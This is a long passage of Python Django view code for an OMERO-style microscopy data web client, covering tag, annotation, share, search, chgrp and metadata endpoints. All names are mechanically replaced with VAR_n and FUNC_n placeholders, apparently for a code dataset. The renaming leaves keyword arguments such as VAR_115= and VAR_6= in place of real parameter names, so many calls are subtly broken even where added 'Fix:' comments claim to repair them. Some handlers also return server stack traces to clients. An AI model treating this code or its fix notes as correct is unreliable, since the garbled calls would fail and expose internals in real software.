        for VAR_13, children in VAR_82.items():
            for VAR_14, VAR_15 in children.items():
                VAR_385 = FUNC_21(
                    VAR_6, VAR_12, VAR_13, VAR_14, VAR_15
                )
                if VAR_385 is None:
                    continue
                VAR_386, VAR_240 = VAR_385
                VAR_387 = [VAR_71.id.val for VAR_71 in VAR_240]
                VAR_0.info("api_link: Deleting %s links" % len(VAR_387))
                VAR_6.deleteObjects(VAR_386, VAR_387, wait=True)
                # Collect links these children still have to other parents.
                VAR_386, VAR_388 = FUNC_21(
                    VAR_6, VAR_12, None, VAR_14, VAR_15
                )
                for rl in VAR_388:
                    VAR_359 = rl.parent.id.val
                    VAR_420 = rl.child.id.val
                    if VAR_359 == int(VAR_13):
                        continue
                    if VAR_12 not in VAR_78:
                        VAR_78[VAR_12] = {}
                    if VAR_359 not in VAR_78[VAR_12]:
                        VAR_78[VAR_12][VAR_359] = {VAR_14: []}
                    VAR_78[VAR_12][VAR_359][VAR_14].append(VAR_420)
    VAR_78["success"] = True
    return JsonResponse(VAR_78)
@login_required()
def FUNC_27(VAR_2, VAR_6=None, **VAR_7):
    """JSON endpoint: list the parent links of the given child objects.

    Accepts ?image=...&dataset=...&plate=... query parameters (values may
    be comma-separated id lists) and returns, per link, the parent
    container and child ids.
    """
    VAR_81 = {"image": "dataset", "dataset": "project", "plate": "screen"}
    VAR_82 = []
    for VAR_14, VAR_12 in VAR_81.items():
        VAR_187 = VAR_2.GET.getlist(VAR_14)
        if len(VAR_187) == 0:
            continue
        # Each query value may itself be a comma-separated id list.
        VAR_15 = []
        for id in VAR_187:
            for VAR_318 in id.split(","):
                VAR_15.append(VAR_318)
        VAR_72, VAR_223 = FUNC_21(
            VAR_6, VAR_12, None, VAR_14, VAR_15
        )
        for VAR_344 in VAR_223:
            VAR_82.append(
                {
                    "id": VAR_344.id.val,
                    "parent": {"type": VAR_12, "id": VAR_344.parent.id.val},
                    "child": {"type": VAR_14, "id": VAR_344.child.id.val},
                }
            )
    return JsonResponse({"data": VAR_82})
@login_required()
def FUNC_28(VAR_2, VAR_6=None, **VAR_7):
    """JSON endpoint: tree paths from the root down to the requested object.

    One of the object-id query parameters identifies the target; tags and
    tagsets use the dedicated paths_to_tag helper, everything else goes
    through paths_to_object.
    """
    try:
        VAR_11 = FUNC_0(VAR_2, "experimenter", None)
        VAR_245 = FUNC_0(VAR_2, "project", None)
        VAR_246 = FUNC_0(VAR_2, "dataset", None)
        VAR_257 = FUNC_0(VAR_2, "image", None)
        VAR_251 = FUNC_0(VAR_2, "screen", None)
        VAR_252 = FUNC_0(VAR_2, "plate", None)
        VAR_258 = FUNC_0(VAR_2, "run", None)
        # "acquisition" is an alias for "run" and wins when both are given.
        VAR_258 = FUNC_0(VAR_2, "acquisition", VAR_258)
        VAR_259 = VAR_2.GET.get("well", None)
        VAR_260 = FUNC_0(VAR_2, "tag", None)
        VAR_261 = FUNC_0(VAR_2, "tagset", None)
        VAR_262 = FUNC_0(VAR_2, "roi", None)
        VAR_263 = FUNC_0(VAR_2, "shape", None)
        VAR_20 = FUNC_0(VAR_2, "group", None)
        VAR_264 = FUNC_0(VAR_2, "page_size", settings.PAGE)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    if VAR_260 is not None or VAR_261 is not None:
        VAR_265 = paths_to_tag(VAR_6, VAR_11, VAR_261, VAR_260)
    else:
        VAR_265 = paths_to_object(
            VAR_6,
            VAR_11,
            VAR_245,
            VAR_246,
            VAR_257,
            VAR_251,
            VAR_252,
            VAR_258,
            VAR_259,
            VAR_20,
            VAR_264,
            VAR_262,
            VAR_263,
        )
    return JsonResponse({"paths": VAR_265})
@login_required()
def FUNC_29(VAR_2, VAR_6=None, **VAR_7):
    """Dispatch tag requests by HTTP method.

    GET lists tags / tagged objects (FUNC_30); DELETE removes tags
    (FUNC_31). Other methods fall through and return None (HTTP 500 via
    Django) -- presumably unreachable given the url routing; verify.
    """
    if VAR_2.method == "GET":
        return FUNC_30(VAR_2, VAR_6, **VAR_7)
    elif VAR_2.method == "DELETE":
        return FUNC_31(VAR_2, VAR_6, **VAR_7)
def FUNC_30(VAR_2, VAR_6=None, **VAR_7):
    """GET handler for tags.

    With an id: marshal the objects tagged by that tag. Without: marshal
    the tag listing itself (optionally orphaned-only).
    """
    try:
        VAR_87 = FUNC_0(VAR_2, "page", 1)
        VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
        VAR_20 = FUNC_0(VAR_2, "group", -1)
        VAR_260 = FUNC_0(VAR_2, "id", None)
        VAR_11 = FUNC_0(VAR_2, "experimenter_id", -1)
        VAR_247 = FUNC_3(VAR_2, "orphaned", False)
        VAR_248 = FUNC_3(VAR_2, "sizeXYZ", False)
        VAR_250 = FUNC_3(VAR_2, "date", False)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    try:
        if VAR_260 is not None:
            # Fix: keyword values referenced undefined names (conn,
            # experimenter_id, tag_id, group_id, ...); use the locals.
            VAR_266 = tree.marshal_tagged(
                VAR_6=VAR_6,
                VAR_11=VAR_11,
                VAR_260=VAR_260,
                VAR_20=VAR_20,
                VAR_87=VAR_87,
                VAR_248=VAR_248,
                VAR_250=VAR_250,
                VAR_88=VAR_88,
            )
        else:
            VAR_266 = {}
            VAR_266["tags"] = tree.marshal_tags(
                VAR_6=VAR_6,
                VAR_247=VAR_247,
                VAR_11=VAR_11,
                VAR_260=VAR_260,
                VAR_20=VAR_20,
                VAR_87=VAR_87,
                VAR_88=VAR_88,
            )
    except ApiUsageException as e:
        return HttpResponseBadRequest(e.serverStackTrace)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
    return JsonResponse(VAR_266)
def FUNC_31(VAR_2, VAR_6=None, **VAR_7):
    """DELETE handler: remove the tag annotations whose ids are given.

    Submits one Delete command per tag inside a single DoAll request and
    waits for completion, mapping server errors to HTTP error responses.
    NOTE(review): `JsonResponse("")` raises TypeError for non-dict data
    in Django unless `safe=False` is passed -- verify intended response.
    """
    try:
        VAR_267 = FUNC_2(VAR_2, "id")
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    VAR_83 = list()
    VAR_84 = None
    try:
        for VAR_260 in VAR_267:
            VAR_83.append(omero.cmd.Delete("/Annotation", VAR_260))
        VAR_268 = omero.cmd.DoAll()
        VAR_268.requests = VAR_83
        VAR_84 = VAR_6.c.sf.submit(VAR_268, VAR_6.SERVICE_OPTS)
        try:
            VAR_6._waitOnCmd(VAR_84)
        finally:
            # Always release the callback handle, even on failure.
            VAR_84.close()
    except CmdError as e:
        return HttpResponseBadRequest(e.message)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
    return JsonResponse("")
@login_required()
def FUNC_32(VAR_2, VAR_6=None, **VAR_7):
    """JSON endpoint: annotations (plus their experimenters) for objects.

    Object ids arrive as repeated query parameters per type; optional
    "type"/"ns" filters restrict the annotation kind and namespace.
    """
    VAR_71 = VAR_2.GET
    VAR_46 = FUNC_1(VAR_2, "image")
    VAR_45 = FUNC_1(VAR_2, "dataset")
    VAR_44 = FUNC_1(VAR_2, "project")
    VAR_47 = FUNC_1(VAR_2, "screen")
    VAR_48 = FUNC_1(VAR_2, "plate")
    VAR_85 = FUNC_1(VAR_2, "acquisition")
    VAR_86 = FUNC_1(VAR_2, "well")
    VAR_87 = FUNC_0(VAR_2, "page", 1)
    VAR_88 = FUNC_0(VAR_2, "limit", VAR_1)
    VAR_89 = VAR_71.get("type", None)
    VAR_90 = VAR_71.get("ns", None)
    # Fix: keyword values referenced undefined names (project_ids,
    # dataset_ids, ..., ann_type, ns, page, limit); use the locals.
    VAR_91, VAR_92 = tree.marshal_annotations(
        VAR_6,
        VAR_44=VAR_44,
        VAR_45=VAR_45,
        VAR_46=VAR_46,
        VAR_47=VAR_47,
        VAR_48=VAR_48,
        VAR_85=VAR_85,
        VAR_86=VAR_86,
        VAR_89=VAR_89,
        VAR_90=VAR_90,
        VAR_87=VAR_87,
        VAR_88=VAR_88,
    )
    return JsonResponse({"annotations": VAR_91, "experimenters": VAR_92})
@login_required()
def FUNC_33(VAR_2, VAR_6=None, **VAR_7):
    """JSON endpoint: shares and discussions for a member/owner."""
    try:
        VAR_87 = FUNC_0(VAR_2, "page", 1)
        VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
        VAR_244 = FUNC_0(VAR_2, "member_id", -1)
        VAR_231 = FUNC_0(VAR_2, "owner_id", -1)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    try:
        # Fix: keyword values referenced the undefined names conn,
        # member_id, owner_id, page and limit; use the locals.
        VAR_112 = tree.marshal_shares(
            VAR_6=VAR_6, VAR_244=VAR_244, VAR_231=VAR_231, VAR_87=VAR_87, VAR_88=VAR_88
        )
        # Fix: result was bound to `discussions` but the return statement
        # reads VAR_269 (NameError at runtime).
        VAR_269 = tree.marshal_discussions(
            VAR_6=VAR_6, VAR_244=VAR_244, VAR_231=VAR_231, VAR_87=VAR_87, VAR_88=VAR_88
        )
    except ApiUsageException as e:
        return HttpResponseBadRequest(e.serverStackTrace)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
    return JsonResponse({"shares": VAR_112, "discussions": VAR_269})
@login_required()
@render_response()
def FUNC_34(VAR_2, VAR_18=None, VAR_19=None, VAR_6=None, **VAR_7):
    """Context for loading a plate (or plate acquisition/run) grid.

    VAR_18 is the object type name, VAR_19 its id; an optional "index"
    GET parameter selects the well field to show.
    """
    VAR_93 = getIntOrDefault(VAR_2, "index", 0)
    VAR_94 = dict()
    if VAR_18 is not None:
        if VAR_19 is not None and int(VAR_19) > 0:
            VAR_94[VAR_345(VAR_18)] = VAR_241(VAR_19)
    try:
        VAR_104 = BaseContainer(VAR_6, **VAR_94)
    except AttributeError as x:
        return handlerInternalError(VAR_2, x)
    VAR_95 = None
    VAR_53 = {"manager": VAR_104, "form_well_index": VAR_95, "index": VAR_93}
    VAR_54 = None
    if "plate" in VAR_94 or "acquisition" in VAR_94:
        VAR_270 = VAR_104.getNumberOfFields()
        if VAR_270 is not None:
            VAR_95 = WellIndexForm(VAR_115={"index": VAR_93, "range": VAR_270})
            if VAR_93 == 0:
                # Default to the first available field.
                VAR_93 = VAR_270[0]
        # Pre-select any wells named in the "show" request.
        VAR_59 = VAR_2.GET.get("show")
        if VAR_59 is not None:
            VAR_346 = []
            for w in VAR_59.split("|"):
                if "well-" in w:
                    VAR_346.append(w.replace("well-", ""))
            VAR_53["select_wells"] = ",".join(VAR_346)
        VAR_53["baseurl"] = VAR_350("webgateway").rstrip("/")
        VAR_53["form_well_index"] = VAR_95
        VAR_53["index"] = VAR_93
        VAR_53["thumbnails_batch"] = settings.THUMBNAILS_BATCH
        # Fix: template path was corrupted ("webclient/VAR_158/VAR_419.html");
        # the plate template lives under webclient/data/.
        VAR_54 = "webclient/data/plate.html"
    if VAR_18 == "acquisition":
        VAR_53["acquisition"] = VAR_19
    VAR_53["isLeader"] = VAR_6.isLeader()
    VAR_53["template"] = VAR_54
    return VAR_53
@login_required()
@render_response()
def FUNC_35(VAR_2, VAR_6=None, **VAR_7):
    """Compute the candidate target groups for moving (chgrp) objects.

    Takes object ids per type from the query string, intersects the
    groups of all owners involved, and excludes the system "user" group
    and (when unambiguous) the objects' current group. Returns owners and
    the eligible groups with their permission flags.
    """
    VAR_96 = []
    VAR_97 = set()
    VAR_98 = []
    VAR_68 = {}
    VAR_77 = {}
    for VAR_215 in ("Project", "Dataset", "Image", "Screen", "Plate"):
        VAR_154 = VAR_2.GET.get(VAR_215, None)
        if VAR_154 is not None:
            for o in VAR_6.getObjects(VAR_215, VAR_154.split(",")):
                VAR_96.append(o.getDetails().owner.id.val)
                VAR_97.add(o.getDetails().group.id.val)
    VAR_96 = list(set(VAR_96))
    if len(VAR_96) == 0:
        # No objects specified: fall back to the current user.
        VAR_96 = [VAR_6.getUserId()]
    for VAR_103 in VAR_6.getObjects(
        "Experimenter", VAR_96, opts={"load_experimentergroups": True}
    ):
        VAR_271 = []
        VAR_77[VAR_103.id] = VAR_103.getFullName()
        for VAR_101 in VAR_103.copyGroupExperimenterMap():
            VAR_68[VAR_101.parent.id.val] = VAR_101.parent
            VAR_271.append(VAR_101.parent.id.val)
        VAR_98.append(set(VAR_271))
    # Only groups shared by every owner are valid targets.
    VAR_99 = set.intersection(*VAR_98)
    VAR_100 = VAR_6.getAdminService().getSecurityRoles().userGroupId
    if VAR_100 in VAR_99:
        # Fix: was `targetGroupIds.remove(...)` -- an undefined name; the
        # candidate set built above is VAR_99.
        VAR_99.remove(VAR_100)
    if len(VAR_97) == 1:
        VAR_272 = VAR_97.pop()
        if VAR_272 in VAR_99:
            VAR_99.remove(VAR_272)
    def FUNC_84(VAR_101):
        # Permission flags of a group, for display in the chgrp dialog.
        VAR_256 = VAR_101.getDetails().permissions
        return {
            "write": VAR_256.isGroupWrite(),
            "annotate": VAR_256.isGroupAnnotate(),
            "read": VAR_256.isGroupRead(),
        }
    VAR_102 = []
    for VAR_335 in VAR_99:
        VAR_102.append(
            {"id": VAR_335, "name": VAR_68[VAR_335].name.val, "perms": FUNC_84(VAR_68[VAR_335])}
        )
    # Fix: list.sort() takes the keyword `key`, not `VAR_310`.
    VAR_102.sort(key=lambda x: x["name"])
    VAR_77 = [[VAR_413, VAR_414] for VAR_413, VAR_414 in VAR_77.items()]
    return {"owners": VAR_77, "groups": VAR_102}
@login_required()
@render_response()
def FUNC_36(VAR_2, VAR_20, VAR_21, VAR_6=None, **VAR_7):
    """Context for the chgrp dialog: the container hierarchy that exists
    in the target group (optionally for one owner).
    """
    VAR_6.SERVICE_OPTS.setOmeroGroup(int(VAR_20))
    VAR_103 = getIntOrDefault(VAR_2, "owner", None)
    VAR_104 = BaseContainer(VAR_6)
    VAR_104.listContainerHierarchy(VAR_103)
    # Fix: template path was corrupted ("webclient/VAR_158/..."); the data
    # templates live under webclient/data/.
    VAR_54 = "webclient/data/chgrp_target_tree.html"
    VAR_53 = {"manager": VAR_104, "target_type": VAR_21, "template": VAR_54}
    return VAR_53
@login_required()
@render_response()
def FUNC_37(VAR_2, VAR_22=None, VAR_6=None, **VAR_7):
    """Run a search (or render the empty search page).

    With a form present, executes the free-text query via BaseSearch;
    when the query consists purely of numeric ids, each id is also looked
    up directly per requested datatype.
    """
    VAR_104 = BaseSearch(VAR_6)
    VAR_105 = []
    VAR_71 = VAR_2.GET
    if VAR_22 is not None:
        VAR_273 = VAR_71.get("query", None)
        if VAR_273 is None:
            return HttpResponse("No search '?query' included")
        # Fix: was `query_search.replace(...)` -- an undefined name; the
        # query string is VAR_273.
        VAR_273 = VAR_273.replace("+", " ")
        VAR_274 = toBoolean(VAR_71.get("advanced"))
        if VAR_274:
            VAR_273 = VAR_71.get("advanced_search")
        VAR_54 = "webclient/search/search_details.html"
        VAR_275 = VAR_71.getlist("datatype")
        VAR_270 = VAR_71.getlist("field")
        VAR_276 = VAR_71.get("searchGroup", None)
        VAR_277 = VAR_71.get("ownedBy", None)
        VAR_278 = toBoolean(VAR_71.get("useAcquisitionDate"))
        VAR_279 = VAR_71.get("startdateinput", None)
        VAR_279 = VAR_279 is not None and smart_str(VAR_279) or None
        VAR_280 = VAR_71.get("enddateinput", None)
        VAR_280 = VAR_280 is not None and smart_str(VAR_280) or None
        VAR_250 = None
        if VAR_279 is not None:
            if VAR_280 is None:
                # Default the end of the date range to today.
                VAR_389 = datetime.datetime.now()
                VAR_280 = "%s-%02d-%02d" % (VAR_389.year, VAR_389.month, VAR_389.day)
            VAR_250 = "%s_%s" % (VAR_279, VAR_280)
        if len(VAR_275) == 0:
            VAR_275 = ["images"]
        VAR_104.search(
            VAR_273,
            VAR_275,
            VAR_270,
            VAR_276,
            VAR_277,
            VAR_278,
            VAR_250,
            rawQuery=VAR_274,
        )
        # Fix: the character class was corrupted (`\VAR_362` is an invalid
        # regex escape); the intent is "digits, spaces and commas only",
        # i.e. a query made purely of object ids.
        VAR_281 = re.compile(r"^[\d ,]+$")
        if VAR_281.search(VAR_273) is not None:
            VAR_6.SERVICE_OPTS.setOmeroGroup(-1)
            VAR_347 = set()
            for queryId in re.split(" |,", VAR_273):
                if len(queryId) == 0:
                    continue
                try:
                    VAR_421 = VAR_241(queryId)
                    if VAR_421 in VAR_347:
                        continue
                    VAR_347.add(VAR_421)
                    for VAR_431 in VAR_275:
                        VAR_431 = VAR_431[0:-1]  # remove 's'
                        if VAR_431 in (
                            "project",
                            "dataset",
                            "image",
                            "screen",
                            "plate",
                            "well",
                        ):
                            VAR_38 = VAR_6.getObject(VAR_431, VAR_421)
                            if VAR_38 is not None:
                                VAR_105.append({"otype": VAR_431, "obj": VAR_38})
                except ValueError:
                    pass
    else:
        VAR_54 = "webclient/search/search.html"
    VAR_53 = {
        "manager": VAR_104,
        "foundById": VAR_105,
        "resultCount": VAR_104.c_size + len(VAR_105),
    }
    VAR_53["template"] = VAR_54
    VAR_53["thumbnails_batch"] = settings.THUMBNAILS_BATCH
    return VAR_53
@login_required()
@render_response()
def FUNC_38(VAR_2, VAR_23, VAR_24, VAR_6=None, VAR_25=None, **VAR_7):
    """Context for the right-hand "general" metadata panel of one object.

    VAR_23 is the object type name, VAR_24 its id. Shares/discussions get
    the share-annotations template; other objects get the general
    metadata template (or the share template when viewed inside a share).
    """
    VAR_93 = getIntOrDefault(VAR_2, "index", 0)
    VAR_53 = dict()
    VAR_106 = VAR_23 == "image" and list(VAR_6.getObjects("Image", [VAR_24])) or list()
    VAR_107 = (
        VAR_23 == "dataset" and list(VAR_6.getObjects("Dataset", [VAR_24])) or list()
    )
    VAR_108 = (
        VAR_23 == "project" and list(VAR_6.getObjects("Project", [VAR_24])) or list()
    )
    VAR_109 = VAR_23 == "screen" and list(VAR_6.getObjects("Screen", [VAR_24])) or list()
    VAR_110 = VAR_23 == "plate" and list(VAR_6.getObjects("Plate", [VAR_24])) or list()
    VAR_111 = (
        VAR_23 == "acquisition"
        and list(VAR_6.getObjects("PlateAcquisition", [VAR_24]))
        or list()
    )
    VAR_112 = (
        (VAR_23 == "share" or VAR_23 == "discussion")
        and [VAR_6.getShare(VAR_24)]
        or list()
    )
    VAR_113 = VAR_23 == "well" and list(VAR_6.getObjects("Well", [VAR_24])) or list()
    VAR_114 = {
        "images": VAR_23 == "image" and [VAR_24] or [],
        "datasets": VAR_23 == "dataset" and [VAR_24] or [],
        "projects": VAR_23 == "project" and [VAR_24] or [],
        "screens": VAR_23 == "screen" and [VAR_24] or [],
        "plates": VAR_23 == "plate" and [VAR_24] or [],
        "acquisitions": VAR_23 == "acquisition" and [VAR_24] or [],
        "wells": VAR_23 == "well" and [VAR_24] or [],
        "shares": ((VAR_23 == "share" or VAR_23 == "discussion") and [VAR_24] or []),
    }
    VAR_115 = {
        "selected": VAR_114,
        "images": VAR_106,
        "datasets": VAR_107,
        "projects": VAR_108,
        "screens": VAR_109,
        "plates": VAR_110,
        "acquisitions": VAR_111,
        "wells": VAR_113,
        "shares": VAR_112,
    }
    VAR_116 = None
    VAR_117 = None
    if VAR_23 in ("share", "discussion"):
        VAR_54 = "webclient/annotations/annotations_share.html"
        VAR_104 = BaseShare(VAR_6, VAR_24)
        VAR_104.getAllUsers(VAR_24)
        VAR_104.getComments(VAR_24)
        # Fix: was `CommentAnnotationForm(VAR_115=initial)` -- `initial`
        # is not defined here; the initial-data dict is VAR_115.
        VAR_116 = CommentAnnotationForm(VAR_115=VAR_115)
    else:
        try:
            VAR_104 = BaseContainer(VAR_6, **{VAR_345(VAR_23): VAR_241(VAR_24), "index": VAR_93})
        except AttributeError as x:
            return handlerInternalError(VAR_2, x)
        if VAR_25 is not None:
            VAR_54 = "webclient/annotations/annotations_share.html"
            VAR_53["share"] = BaseShare(VAR_6, VAR_25)
        else:
            VAR_54 = "webclient/annotations/metadata_general.html"
            VAR_53["canExportAsJpg"] = VAR_104.canExportAsJpg(VAR_2)
            VAR_53["annotationCounts"] = VAR_104.getAnnotationCounts()
            VAR_117 = VAR_104.listFigureScripts()
    VAR_53["manager"] = VAR_104
    if VAR_23 in ("tag", "tagset"):
        VAR_53["insight_ns"] = omero.rtypes.rstring(
            omero.constants.metadata.NSINSIGHTTAGSET
        ).val
    if VAR_116 is not None:
        VAR_53["form_comment"] = VAR_116
    VAR_53["figScripts"] = VAR_117
    VAR_53["template"] = VAR_54
    VAR_53["webclient_path"] = VAR_350("webindex")
    return VAR_53
@login_required()
@render_response()
def FUNC_39(VAR_2, VAR_23, VAR_24, VAR_6=None, VAR_25=None, **VAR_7):
    """Context for the "preview" metadata tab: the image's rendering defs.

    Keeps one rendering def per owner (the highest id), marks the current
    one, and serialises each def into the compact channel-string format
    used by the viewer.
    """
    VAR_53 = {}
    VAR_93 = getIntOrDefault(VAR_2, "index", 0)
    VAR_104 = BaseContainer(VAR_6, **{VAR_345(VAR_23): VAR_241(VAR_24)})
    if VAR_25:
        VAR_53["share"] = BaseShare(VAR_6, VAR_25)
    if VAR_23 == "well":
        VAR_104.image = VAR_104.well.getImage(VAR_93)
    VAR_118 = VAR_104.image.getAllRenderingDefs()
    VAR_119 = {}
    VAR_120 = VAR_104.image.getRenderingDefId()
    for VAR_71 in VAR_118:
        VAR_229 = VAR_71["owner"]["id"]
        VAR_71["current"] = VAR_71["id"] == VAR_120
        # Keep only the newest (highest-id) rendering def per owner.
        if VAR_229 not in VAR_119 or VAR_119[VAR_229]["id"] < VAR_71["id"]:
            VAR_119[VAR_229] = VAR_71
    # Fix: was `rdefs.values()` -- an undefined name; the per-owner dict
    # built above is VAR_119.
    VAR_119 = VAR_119.values()
    VAR_121 = []
    for VAR_71 in VAR_119:
        VAR_282 = []
        for VAR_318, VAR_382 in enumerate(VAR_71["c"]):
            VAR_348 = "-"
            if VAR_382["active"]:
                VAR_348 = ""
            VAR_349 = VAR_382["lut"] if "lut" in VAR_382 else VAR_382["color"]
            VAR_350 = "r" if VAR_382["inverted"] else "-r"
            VAR_282.append(
                "%s%s|%s:%s%s$%s" % (VAR_348, VAR_318 + 1, VAR_382["start"], VAR_382["end"], VAR_350, VAR_349)
            )
        VAR_121.append(
            {
                "id": VAR_71["id"],
                "owner": VAR_71["owner"],
                "c": ",".join(VAR_282),
                "m": VAR_71["model"] == "greyscale" and "g" or "c",
            }
        )
    VAR_122, VAR_123 = VAR_6.getMaxPlaneSize()
    VAR_124 = VAR_104.image.getSizeX()
    VAR_125 = VAR_104.image.getSizeY()
    VAR_53["tiledImage"] = (VAR_124 * VAR_125) > (VAR_122 * VAR_123)
    VAR_53["manager"] = VAR_104
    VAR_53["rdefsJson"] = json.dumps(VAR_121)
    VAR_53["rdefs"] = VAR_119
    VAR_53["template"] = "webclient/annotations/metadata_preview.html"
    return VAR_53
@login_required()
@render_response()
def FUNC_40(VAR_2, VAR_23, VAR_24, VAR_6=None, **VAR_7):
    """Context for the "hierarchy" metadata tab.

    Just wraps the object identified by VAR_23 (type name) / VAR_24 (id)
    in a BaseContainer manager for the hierarchy template.
    """
    VAR_104 = BaseContainer(VAR_6, **{VAR_345(VAR_23): VAR_241(VAR_24)})
    VAR_53 = {"manager": VAR_104}
    VAR_53["template"] = "webclient/annotations/metadata_hierarchy.html"
    return VAR_53
@login_required()
@render_response()
def FUNC_41(
    VAR_2, VAR_23, VAR_24, VAR_6=None, VAR_25=None, **VAR_7
):
    """Build the acquisition-metadata context for an object.

    For shares/discussions a lightweight share context is returned; for
    images, per-channel forms plus instrument-level forms (objectives,
    filters, dichroics, detectors, light sources) are assembled.
    """
    try:
        if VAR_23 in ("share", "discussion"):
            VAR_54 = "webclient/annotations/annotations_share.html"
            VAR_104 = BaseShare(VAR_6, VAR_24)
            VAR_104.getAllUsers(VAR_24)
            VAR_104.getComments(VAR_24)
        else:
            VAR_54 = "webclient/annotations/metadata_acquisition.html"
            VAR_104 = BaseContainer(VAR_6, **{VAR_345(VAR_23): VAR_241(VAR_24)})
    except AttributeError as x:
        return handlerInternalError(VAR_2, x)
    VAR_126 = None
    VAR_127 = None
    VAR_128 = None
    VAR_129 = list()
    VAR_130 = None
    VAR_131 = list()
    VAR_132 = list()
    VAR_133 = list()
    VAR_134 = list()
    VAR_135 = list()
    VAR_136 = list(VAR_6.getEnumerationEntries("LaserType"))
    VAR_137 = list(VAR_6.getEnumerationEntries("ArcType"))
    VAR_138 = list(VAR_6.getEnumerationEntries("FilamentType"))
    # Enumerations below are loaded lazily, only when first needed.
    VAR_139 = None
    VAR_140 = None
    VAR_141 = None
    if VAR_23 == "image":
        if VAR_25 is None:
            VAR_104.companionFiles()
        VAR_104.channelMetadata()
        for theC, ch in enumerate(VAR_104.channel_metadata):
            VAR_351 = ch.getLogicalChannel()
            if VAR_351 is not None:
                VAR_390 = dict()
                VAR_390["form"] = MetadataChannelForm(
                    VAR_115={
                        "logicalChannel": VAR_351,
                        "exWave": ch.getExcitationWave(units=True),
                        "emWave": ch.getEmissionWave(units=True),
                        "illuminations": list(
                            VAR_6.getEnumerationEntries("IlluminationI")
                        ),
                        "contrastMethods": list(
                            VAR_6.getEnumerationEntries("ContrastMethodI")
                        ),
                        "modes": list(VAR_6.getEnumerationEntries("AcquisitionModeI")),
                    }
                )
                if VAR_25 is None:
                    VAR_422 = VAR_351.getLightPath()
                    if VAR_422 is not None:
                        VAR_390["form_dichroic"] = None
                        VAR_390["form_excitation_filters"] = list()
                        VAR_390["form_emission_filters"] = list()
                        VAR_432 = VAR_422.getDichroic()
                        if VAR_432 is not None:
                            VAR_390["form_dichroic"] = MetadataDichroicForm(
                                VAR_115={"dichroic": VAR_432}
                            )
                        VAR_433 = list(VAR_6.getEnumerationEntries("FilterTypeI"))
                        for f in VAR_422.getEmissionFilters():
                            VAR_390["form_emission_filters"].append(
                                MetadataFilterForm(
                                    VAR_115={"filter": f, "types": VAR_433}
                                )
                            )
                        for f in VAR_422.getExcitationFilters():
                            VAR_390["form_excitation_filters"].append(
                                MetadataFilterForm(
                                    VAR_115={"filter": f, "types": VAR_433}
                                )
                            )
                    VAR_423 = VAR_351.getDetectorSettings()
                    if (
                        VAR_423._obj is not None
                        and VAR_423.getDetector()
                    ):
                        VAR_390["form_detector_settings"] = MetadataDetectorForm(
                            VAR_115={
                                "detectorSettings": VAR_423,
                                "detector": VAR_423.getDetector(),
                                "types": list(
                                    VAR_6.getEnumerationEntries("DetectorTypeI")
                                ),
                                "binnings": list(VAR_6.getEnumerationEntries("Binning")),
                            }
                        )
                    VAR_424 = VAR_351.getLightSourceSettings()
                    if (
                        VAR_424 is not None
                        and VAR_424._obj is not None
                    ):
                        VAR_434 = VAR_424.getLightSource()
                        if VAR_434 is not None:
                            # Pick the enumeration matching the light-source class.
                            VAR_437 = VAR_136
                            if VAR_434.OMERO_CLASS == "Arc":
                                VAR_437 = VAR_137
                            elif VAR_434.OMERO_CLASS == "Filament":
                                VAR_437 = VAR_138
                            VAR_390["form_light_source"] = MetadataLightSourceForm(
                                VAR_115={
                                    "lightSource": VAR_434,
                                    "lightSourceSettings": VAR_424,
                                    "lstypes": VAR_437,
                                    "mediums": list(
                                        VAR_6.getEnumerationEntries("LaserMediumI")
                                    ),
                                    "pulses": list(
                                        VAR_6.getEnumerationEntries("PulseI")
                                    ),
                                }
                            )
                VAR_390["label"] = ch.getLabel()
                VAR_349 = ch.getColor()
                VAR_390["color"] = VAR_349 is not None and VAR_349.getHtml() or None
                VAR_391 = (
                    VAR_104.image
                    and VAR_104.image.getPrimaryPixels().copyPlaneInfo(
                        theC=theC, theZ=0
                    )
                )
                VAR_392 = []
                for pi in VAR_391:
                    VAR_425 = pi.getDeltaT(units="SECOND")
                    VAR_426 = pi.getExposureTime(units="SECOND")
                    if VAR_425 is None and VAR_426 is None:
                        continue
                    if VAR_425 is not None:
                        # Bug fix: was "deltaT.getValue()" — undefined name.
                        VAR_425 = VAR_425.getValue()
                    if VAR_426 is not None:
                        # Bug fix: was "exposure.getValue()" — undefined name.
                        VAR_426 = VAR_426.getValue()
                    VAR_392.append(
                        {"theT": pi.theT, "deltaT": VAR_425, "exposureTime": VAR_426}
                    )
                VAR_390["plane_info"] = VAR_392
                VAR_134.append(VAR_390)
        try:
            VAR_142 = VAR_104.well.getWellSample().image()
        except Exception:
            VAR_142 = VAR_104.image
        if VAR_25 is None:  # 9853
            if VAR_142.getObjectiveSettings() is not None:
                if VAR_139 is None:
                    VAR_139 = list(VAR_6.getEnumerationEntries("MediumI"))
                if VAR_140 is None:
                    VAR_140 = list(VAR_6.getEnumerationEntries("ImmersionI"))
                if VAR_141 is None:
                    VAR_141 = list(VAR_6.getEnumerationEntries("CorrectionI"))
                VAR_127 = MetadataObjectiveSettingsForm(
                    VAR_115={
                        "objectiveSettings": VAR_142.getObjectiveSettings(),
                        "objective": VAR_142.getObjectiveSettings().getObjective(),
                        "mediums": VAR_139,
                        "immersions": VAR_140,
                        "corrections": VAR_141,
                    }
                )
            if VAR_142.getImagingEnvironment() is not None:
                VAR_126 = MetadataEnvironmentForm(VAR_115={"image": VAR_142})
            if VAR_142.getStageLabel() is not None:
                VAR_130 = MetadataStageLabelForm(VAR_115={"image": VAR_142})
            VAR_352 = VAR_142.getInstrument()
            if VAR_352 is not None:
                if VAR_352.getMicroscope() is not None:
                    VAR_128 = MetadataMicroscopeForm(
                        VAR_115={
                            "microscopeTypes": list(
                                VAR_6.getEnumerationEntries("MicroscopeTypeI")
                            ),
                            "microscope": VAR_352.getMicroscope(),
                        }
                    )
                VAR_393 = VAR_352.getObjectives()
                for o in VAR_393:
                    if VAR_139 is None:
